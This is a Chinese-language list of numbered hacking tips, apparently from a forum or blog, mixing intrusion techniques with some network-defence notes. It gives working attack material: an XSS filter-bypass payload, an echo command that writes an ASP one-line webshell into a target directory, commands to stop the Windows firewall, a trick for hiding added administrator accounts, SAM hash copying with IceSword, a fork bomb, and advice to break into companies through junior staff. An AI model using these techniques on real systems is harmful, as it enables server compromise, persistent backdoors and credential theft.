1、提权简单归纳一下,可以分为系统设置与第三方软件缺陷提权、溢出提权、社会工程学提权。 2、asp webshell想要执行cmd命令,需要具备一起其中任一个组件:wscript.shell、wscript.shell1、shell applition、shell applition1 3、有时候添加账号没成功可能是服务器的强密码策略(万恶的2008),改个超强度的密码再往死里整吧。 4、有时候能够添加用户,但是不能添加管理员组,这时候考虑是不是管理员组被改名了。可以利用net user administrator查看管理员所属的组来确定名称。 5、添加账号一个小小技巧,妙用无限:在添加账号时,将账号名设为“ ”(引号里的字符为搜狗拼音打v+1时候的d项),不懂什么意思,net user一下你就知道这个淫荡的技巧了。 7、XSS绕绕绕2: search?str=xxxx%3Ca%20href=%22data:text/html;%26%230000000000000000098ase64%26%230000000000000044%20PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3Etest%3C/a%3E 复制代码 缺陷参数:str 过滤规则够BT 但是同样能绕! 会把提交的编码 给解码 然后再插入到网页中!然后再对网页内的值进行检查 过滤! base64 --< %26%230000000000000000098ase64 复制代码 首先%26%23会被还原成 &# 于是变成了: b 于是被还原成:b b插入到页面 再检查 b+ase64 = base64 满足规则 于是又过滤成 base64 绕过失败! 但是如果b的html十进制编码 再多加几个000 便不会被他给解码 但是在浏览器中又会被解码 于是便可以这样绕过! ——摘自《XSS神器]XssEncode chrome插件 – 0x_Jin》 8、泪滴攻击是拒绝服务攻击的一种。 泪滴是一个特殊构造的应用程序,通过发送伪造的相互重叠的IP分组数据包,使其难以被接收主机重新组合。他们通常会导致目标主机内核失措 。 泪滴攻击利用IP分组数据包重叠造成TCP/ IP分片重组代码不能恰当处理IP包。影响的系统有Windows 3.1、Windows 95和NT、2.0.32和2.1.63版本以下的Linux。 9、当防火墙被放置在外网边界,一般不会开启IDS功能,外网的攻击比较多,也比较复杂,开启IDS可能导致防火墙的性能出现问题。一般来说,当防火墙处于信息中心边界时,可以开启IDS;而在外网边界可以使用专门的IDS或IPS设备。 10、Nessus是一个强大的扫描器,强大到它甚至拥有属于自己的脚本语言,称为Attack Scripting Language(NASL)。 11、得到目标站目录, 不能直接跨的 。 可以通过” echo ^<%execute(request(“cmd”))%^> >>X:目标目录 X.asp “或者 “copy 脚本文件 X:目标目录X.asp”像目标目录写入 webshell,或者还可以试试 type 命令。 12、在win下关闭防火墙 和 TCP/IP 筛选的命令:net stop policyagent & net stop sharedaccess 13、当 GetHashes 获取不到 hash 时,可以用冰刃(IceSword)把 sam 复制到桌面(适用于Windows 2000/XP/2003/Vista操作系统)。 14、一般来说,中文编码使用big5时,在写入某些数据库系统中,在“许、盖、功”这些字体上面会发生错误。 15、 :(){ :|:& };: 复制代码 ——Linux fork炸弹,其防范的方法是使用命令“ulimit -u 200”来限制每个用户可以使用的最大进程数量。 16、标准ACL , 所谓标准,就是指依照标准IP协议进行过滤,而且只对数据包的源IP地址进行控制。所以,标准ACL的应用要尽量靠近目的IP。 17、扩展ACL应该靠近特征数据的源地址所在端口,这样可以将被阻止的数据尽快地组织在不需传递它的网络外面。 18、渗透一定意义上是人与人的较量,所以呢,如果你现在月薪5000那么去黑掉一个大家伙的时候应该从月薪2000的地方入手,譬如前台,运营,客服,hr,公关之类的为佳,找程序的入口也应该找实习生开发的,找外包的……